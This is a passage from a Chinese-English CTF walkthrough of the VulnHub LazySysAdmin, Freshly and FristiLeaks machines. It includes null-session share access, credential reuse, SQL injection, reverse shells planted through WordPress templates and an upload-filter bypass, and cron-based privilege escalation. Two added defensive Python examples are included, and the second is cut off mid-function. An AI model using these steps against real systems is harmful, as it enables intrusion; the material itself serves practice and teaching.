Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-550 BUILTIN\Print Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-1000 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-1001 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-22-1 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-22-1-1000 Unix User\togie (Local User)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" 
CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-512 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-514 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Getting printer info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">No printers returned.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;">enum4linux complete on Thu Feb  <span class="cm-number">1</span> <span class="cm-number">00</span>:46:33 <span class="cm-number">2018</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 4142px;"></div><div class="CodeMirror-gutters" style="display: none; height: 4172px;"></div></div></div></pre>
<p>Accessing the share from Windows:</p>
<pre class="md-fences md-end-block" lang="bash">net use k: \\192.168.0.100\share$</pre>
<p>Accessing the share from Linux (a null session, with an empty username and password):</p>
<pre class="md-fences md-end-block" lang="bash">mount -t cifs -o username='',password='' //192.168.0.100/share$ /mnt</pre>
<p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/2.png' alt='2' referrerPolicy='no-referrer' /></p>
<p>Two key files are found: deets.txt and wp-config.php.</p>
<p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/3.png' alt='3' referrerPolicy='no-referrer' /></p>
<p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/4.png' alt='4' referrerPolicy='no-referrer' /></p>
<p>Trying the MySQL credentials obtained above to log in to phpMyAdmin works, but not a single table can be viewed.</p>
<p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/5.png' alt='5' referrerPolicy='no-referrer' /></p>
<p>In addition, another password found above is 12345, and when the WordPress page was visited earlier it displayed <code>My name is togie.</code>, so we can try logging in over SSH with username <code>togie</code> and password <code>12345</code>, which succeeds.</p>
<pre class="md-fences md-end-block" lang="bash">togie@LazySysAdmin:~$ whoami
togie
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
togie@LazySysAdmin:~$ sudo su
[sudo] password for togie: 
root@LazySysAdmin:/home/togie# id
uid=0(root) gid=0(root) groups=0(root)</pre>
<p>With root privileges we can read the target file /root/proof.txt, which completes the challenge. Here togie happens to have sudo rights (note the 27(sudo) group in the id output), so switching to root with sudo su works directly; if togie did not have that privilege, another privilege-escalation route would be needed.</p>
<h3><a name='header-n8459' class='md-header-anchor '></a>Approach 2</h3>
<p>Log in to the WordPress dashboard with username <code>Admin</code> and password <code>TogieMYSQL12345^^</code>, and insert PHP reverse-shell code into the 404.php page template.</p>
<p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/7.png' alt='7' referrerPolicy='no-referrer' /></p>
<p>After editing, click upload file below to apply the change, then visit <a href='http://192.168.0.100/wordpress/?p=2' target='_blank' class='url'>http://192.168.0.100/wordpress/?p=2</a></p>
<pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;">root@kali:~# nc -vlp 1234
listening on [any] 1234 ...
192.168.0.100: inverse host lookup failed: Unknown host
connect to [192.168.0.109] from (UNKNOWN) [192.168.0.100] 36468
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
 16:03:42 up 6 min,  0 users,  load average: 0.01, 0.15, 0.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ sudo su
sudo: no tty present and no askpass program specified</pre>
<p>The error "no tty present and no askpass program specified" appears. The target happens to have a Python environment, so use it to spawn a new shell with a pseudo-terminal:</p>
<pre class="md-fences md-end-block" lang="bash">python -c 'import pty; pty.spawn("/bin/sh")'</pre>
<p>But the password for www-data is unknown, so the next step is privilege escalation. First, look at the target's details:</p>
<pre class="md-fences md-end-block" lang="bash">$ uname -r
4.4.0-31-generic
$ lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 14.04.5 LTS
Release:	14.04
Codename:	trusty</pre>
<p>So CVE-2017-1000112 can be used to escalate privileges, but the target has no gcc. In that case, set up a local environment identical to the target, compile the privilege-escalation exploit locally, and then run it on the target.</p>
<p>Installing dirb (already included in Kali):</p>
<pre class="md-fences md-end-block" lang="bash">wget https://svwh.dl.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz
tar zxvf dirb222.tar.gz
cd dirb222/
apt-get install libcurl4-gnutls-dev
./configure && make
./dirb # run it</pre>
<p>References:</p>
<p><a href='https://grokdesigns.com/vulnhub-walkthrough-lazysysadmin-1/'>VulnHub Walk-through – LazySysAdmin: 1</a></p>
<p><a href='https://uart.io/2017/12/lazysysadmin-1/'>LazySysAdmin Vulnerable Machine Walk-through</a></p>
<h1><a name='header-n8486' class='md-header-anchor '></a>Section 6: Freshly</h1>
<h1><a name='header-n8489' class='md-header-anchor '></a>Vulnhub-TopHatSec: Freshly</h1>
<h2><a name='header-n8490' class='md-header-anchor '></a>Target overview</h2>
<h3><a name='header-n8491' class='md-header-anchor '></a>Download link</h3>
<p><a href='https://download.vulnhub.com/tophatsec/Freshly.ova' target='_blank' class='url'>https://download.vulnhub.com/tophatsec/Freshly.ova</a></p>
<h3><a name='header-n8494' class='md-header-anchor '></a>Runtime environment</h3>
<ul><li>VirtualBox</li><li>VMware (running it gives an error, and the fix link provided is already a 404)</li></ul>
<p>VirtualBox is recommended for this target.</p>
<h3><a name='header-n8504' class='md-header-anchor '></a>Description</h3>
<p>The goal of this target is to penetrate the host over the network and find the secret hidden in a sensitive file.</p>
<h3><a name='header-n8508' class='md-header-anchor '></a>Runtime environment</h3>
<p>Import the downloaded OVA file into VirtualBox.</p>
<h2><a name='header-n8511' class='md-header-anchor '></a>Penetration approach</h2>
<h3><a name='header-n8512' class='md-header-anchor '></a>Service discovery</h3>
<p>Port scan</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_1.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>OS identification</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_2.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Further scanning of the main ports</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_3.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Port 80</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_4.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Port 8080</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_5.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Ports 8080 and 443 are both web services, and both run WordPress.</p>
<h3><a name='header-n8535' class='md-header-anchor '></a>Checking known services</h3>
<p>Scanning WordPress</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_6.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Three plugins have security issues, but they do not help much with further penetration. While that scan runs, a directory scan of port 80 with <code>nikto</code> finds phpmyadmin and login.php.</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_7.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>login.php</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_8.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Testing with sqlmap</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_9.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Injection confirmed</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_10.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Listing the databases</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_11.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_12.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Looking in the WordPress8080 database reveals the WordPress username and password.</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_13.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Log in to the admin panel and change the language to Chinese.</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_14.jpg' alt='' referrerPolicy='no-referrer' /></p>
<h3><a name='header-n8570' class='md-header-anchor '></a>Getting a shell</h3>
<p>There are two ways to get a shell from WordPress. One is to add a plugin: package a correctly formatted shell as a .zip and upload it.</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_15.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>The other is to edit a theme file directly.</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_16.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Here the direct-edit method is used to get a shell: write the shell into the 404 page.</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_17.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Start a local nc listener.</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_18.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Visit the 404 page and the shell connects back.</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_19.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>View passwd</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_20.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_21.jpg' alt='' referrerPolicy='no-referrer' /></p>
<h1><a name='header-n8599' class='md-header-anchor '></a>Section 7: FristiLeaks v1.3</h1>
<h2><a name='header-n8600' class='md-header-anchor '></a>Target information</h2>
<h3><a name='header-n8601' class='md-header-anchor '></a>Download link</h3>
<p><a href='https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent' target='_blank' class='url'>https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent</a> <a href='https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova' target='_blank' class='url'>https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova</a></p>
<h3><a name='header-n8605' class='md-header-anchor '></a>Runtime environment</h3>
<ul><li>VirtualBox (either one)</li><li>VMware Workstation Player</li></ul>
<h3><a name='header-n8613' class='md-header-anchor '></a>Setup</h3>
<p>According to the instructions on the official site, the VMware virtual machine's MAC address must first be set to 08:00:27:A5:A6:76 <img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_1.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Then start the VM.</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_2.jpg' alt='' referrerPolicy='no-referrer' /></p>
<h3><a name='header-n8621' class='md-header-anchor '></a>Host discovery</h3>
<p><code>netdiscover -r 10.10.10.0/24</code></p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_3.jpg' alt='' referrerPolicy='no-referrer' /><br/></p>
<p>The target host is found at 10.10.10.132.</p>
<h3><a name='header-n8628' class='md-header-anchor '></a>Service discovery</h3>
<p><code>nmap -sS -Pn -T4 -p- 10.10.10.132</code></p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_4.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Port 80 is open, with the service identified as HTTP.</p>
<h3><a name='header-n8635' class='md-header-anchor '></a>Detailed scan of port 80</h3>
<p>Only port 80 was found open, so probe it in detail:</p>
<p><code>nmap -A -O -p80 10.10.10.132</code></p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_5.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>This yields the following useful information:</p>
<pre class="md-fences md-end-block" lang="">Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
http-robots.txt: 3 disallowed entries</pre>
<p>Browse the web site.</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_6.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>The nmap results show a <code>robots.txt</code> file; take a look:</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_7.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Visit the three paths mentioned in <code>robots.txt</code>:</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_8.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>All three directories have the same content, just the image above.</p>
<p>Next, enumerate directories:</p>
<p><code>dirb http://10.10.10.132</code></p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_9.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Several pictures are found in the <code>images</code> directory:</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_10.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>Looking at the pictures, <code>keep-calm</code> seems to be a hint:</p>
<p>KEEP CALM AND DRINK FRISTI</p>
<p>Try visiting <a href='http://10.10.10.132/fristi' target='_blank' class='url'>http://10.10.10.132/fristi</a>/</p>
<p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_11.jpg' alt='' referrerPolicy='no-referrer' /></p>
<p>A login form is found. The login page has a serious security issue: both input fields have autocomplete enabled (including the password field)
​   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>扫描一下该目录:</p><p><code>dirb http://10.10.10.132/fristi/</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>发现了<code>upload</code>目录的index页面</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_14.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看源代码发现线索:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>注释当中的信息表明,此页面是一个叫eezeepz的人留下来的。</p><p>推测,<code>eezeepz</code>或许是账号或者密码</p><p>继续向下,发现一大块用base64编码的字符串</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>复制,写入一个文件,之后使用命令解码:</p><p><code>base64 -d /tmp/encoded.txt</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根据文件格式,这是一个PNG格式的图画,保存为PNG格式</p><p><code>base64 -d /tmp/encoded.txt > decoded.png</code></p><p>查看发现一串字符串</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>尝试使用以上获取的信息进行登录:</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div 
class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">username:eezeepz</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">password:keKkeKKeKKeKkEkkEk</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>登陆成功,发现文件上传。此上传点未做任何过滤,可以直接上传shell文件。</p><p>反弹Shell的脚本木马可以在这里下载:<a href='http://pentestmonkey.net/tools/web-shells/php-reverse-shell' target='_blank' class='url'>http://pentestmonkey.net/tools/web-shells/php-reverse-shell</a></p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: 
relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">cp</span> /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">vi</span> reverse-shell.php</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>修改反弹shell的ip地址和监听端口。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_20.jpg' alt='' referrerPolicy='no-referrer' /></p><p>使用<code>nc</code>监听端口:</p><p><code>nc -nlvp 8888</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_21.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>根据回显,只有png, jpg, gif 能上传</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_22.jpg' alt='' referrerPolicy='no-referrer' /></p><p>修改一下文件名,后缀加上<code>.jpg</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_23.jpg' alt='' referrerPolicy='no-referrer' />
​   <br/>
The upload succeeded; open the uploaded shell:<br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>We now have a low-privilege shell.<br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_25.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8754' class='md-header-anchor '></a>Privilege escalation</h3><p>Looking around the filesystem, in the <code>home</code> directory:</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_27.jpg' alt='' referrerPolicy='no-referrer' /><br/>
we see the home directory of the key person, eezeepz.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>A hint is found in <code>notes.txt</code>:<br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Following the hint, create a <code>runthis</code> file under /tmp.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_30.jpg' alt='' referrerPolicy='no-referrer' />
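</p><p>The mechanism notes.txt describes, a scheduled job that executes whatever it finds in a file under /tmp with another account's privileges, is a privilege boundary a defender should be able to spot in a crontab before anyone abuses it. The Python script below is an added example, not part of the original write-up or of the FristiLeaks VM: it parses crontab lines, extracts the absolute paths each command touches, and flags entries that reference a world-writable file or a path inside a shared writable directory such as /tmp. The crontab lines and the world-writable script it checks are constructed inline for the demonstration; the function names are my own.</p><pre class="md-fences md-end-block" lang="python">
```python
"""Audit crontab entries that execute content other users can modify.

Added example (not code from the write-up or the FristiLeaks VM).  The
crontab lines and the world-writable script below are constructed for the
demonstration; the function names are my own.
"""
import os
import re
import stat
import tempfile

# Absolute paths that appear anywhere in a cron command line.
PATH_RE = re.compile(r"(/[A-Za-z0-9_./-]+)")

# Directories where any local user can create or replace files.
SHARED_WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def is_world_writable(path):
    """True if `path` exists and its mode grants write access to 'other'."""
    try:
        mode = os.stat(path).st_mode
    except OSError:          # missing file: nothing to say about its mode
        return False
    return bool(stat.S_IMODE(mode) & stat.S_IWOTH)


def in_shared_dir(path):
    """True if `path` lives under a directory that every user can write to."""
    return any(path == d or path.startswith(d + "/") for d in SHARED_WRITABLE_DIRS)


def audit_cron_line(line):
    """Return findings (strings) for one crontab line; an empty list means clean.

    Handles system crontab lines (time fields, user, command), user crontab
    lines (time fields, command) and @reboot-style shortcuts.  The user name
    is left inside the command text on purpose: it never starts with '/', so
    the path extraction is unaffected.
    """
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return []
    if stripped.startswith("@"):
        fields = stripped.split(None, 1)
        command = fields[1] if len(fields) == 2 else ""
    else:
        fields = stripped.split(None, 5)
        if len(fields) != 6:
            return []
        command = fields[5]
    findings = []
    for path in PATH_RE.findall(command):
        # The more specific reason (an existing file anyone can edit) wins.
        if is_world_writable(path):
            findings.append("%s: %s is world-writable" % (command, path))
        elif in_shared_dir(path):
            findings.append("%s: %s lives in a shared writable directory" % (command, path))
    return findings


def audit_crontab(text):
    """Run audit_cron_line over every line of a crontab and collect findings."""
    findings = []
    for line in text.splitlines():
        findings.extend(audit_cron_line(line))
    return findings


def demo():
    """Audit a constructed crontab and return the findings."""
    with tempfile.TemporaryDirectory() as tmpdir:
        loose_script = os.path.join(tmpdir, "cleanup.sh")
        with open(loose_script, "w") as fh:
            fh.write("#!/bin/sh\necho cleanup\n")
        os.chmod(loose_script, 0o777)       # deliberately world-writable
        crontab = "\n".join([
            "# constructed sample crontab",
            "*/1 * * * * admin /bin/sh /tmp/runthis",            # FristiLeaks-style job
            "0 3 * * * root /bin/sh " + loose_script,            # trusts a loose script
            "0 4 * * * root /usr/bin/find /var/log -name '*.gz' -delete",
        ])
        return audit_crontab(crontab)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```
</pre><p>Running the script reports two findings for the constructed crontab: the <code>/tmp/runthis</code> job and the job whose script is world-writable; the <code>find</code> job passes. In practice the same audit can be pointed at <code>/etc/crontab</code>, <code>/etc/cron.d/*</code> and the per-user crontabs, and the fix for a flagged entry is to move the executed file somewhere only the owning account can write.</p><p>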
<br/></p><h3><a name='header-n8772' class='md-header-anchor '></a>Granting permissions</h3><p>According to the hint in <code>notes.txt</code>, commands written into <code>/tmp/runthis</code> are executed on a schedule, so use it to change the permissions of the <code>/home/admin</code> directory.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_31.jpg' alt='' referrerPolicy='no-referrer' /><br/>
Once the system has run the command, the contents of <code>/home/admin</code> can be read.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>There are several files; look at them one by one.</p><p>cryptpass.py</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_33.jpg' alt='' referrerPolicy='no-referrer' /> 
cryptedpass.txt<br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_34.jpg' alt='' referrerPolicy='no-referrer' /> 
whoisyourgodnow.txt</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_35.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>It looks like the Python script was used to encrypt these values.
Rewrite the file so that it reverses the steps:<br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_36.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Try decrypting:<br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_37.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_38.jpg' alt='' referrerPolicy='no-referrer' /><br/>
This gives, respectively:</p><pre class="md-fences md-end-block" lang="">1.mVGZ3O3omkJLmy2pcuTq  :thisisalsopw123
2.=RFn0AKnlMHMPIzpyuTI0ITG :LetThereBeFristi!</pre><p>These may be the password of the user fristigod, so try the combinations.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_39.jpg' alt='' referrerPolicy='no-referrer' /><br/>
Based on the error message, some research shows that
it relates to how <code>su</code> is implemented: on this system (environment B) <code>su</code> checks whether standard input is a tty, whereas in environment A <code>su</code> allows the password to be read from another file.</p><p>The fix is as follows:</p><p><code>python -c 'import pty;pty.spawn("/bin/sh")'</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_40.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>After this it works normally.</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_41.jpg' alt='' referrerPolicy='no-referrer' />
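</p><p>Before moving on, the cryptpass.py step above deserves a note from the defender's side. The values in cryptedpass.txt and whoisyourgodnow.txt were recovered without any key because the script does not encrypt, it only encodes. The Python below is an added example, not the script from the FristiLeaks VM or from the original write-up; the transformation it implements (base64, then reversal of the string, then rot13) is inferred from the two values recovered above, and the function names are my own. It provides both directions of the transformation, checks them against those two values, and contrasts the scheme with a salted PBKDF2 hash, which is what a password store should hold instead, since a hash cannot be turned back into the password.</p><pre class="md-fences md-end-block" lang="python">
```python
"""Reversible encoding vs. a real password hash (added example).

Not the script from the FristiLeaks VM or the original write-up.  The
transformation (base64, reverse, rot13) is inferred from the two values
recovered in the write-up; the function names are my own.
"""
import base64
import codecs
import hashlib
import hmac
import os


def cryptpass_encode(plaintext):
    """Forward transformation: base64-encode, reverse the string, then rot13."""
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot_13")


def cryptpass_decode(token):
    """Inverse transformation.

    rot13 undoes itself, the reversal is undone by reversing again, and
    base64 decodes.  No key is involved anywhere, so whoever holds the stored
    value holds the password.
    """
    b64 = codecs.decode(token, "rot_13")[::-1]
    return base64.b64decode(b64).decode("utf-8")


def hash_password(password, salt=None, iterations=200000):
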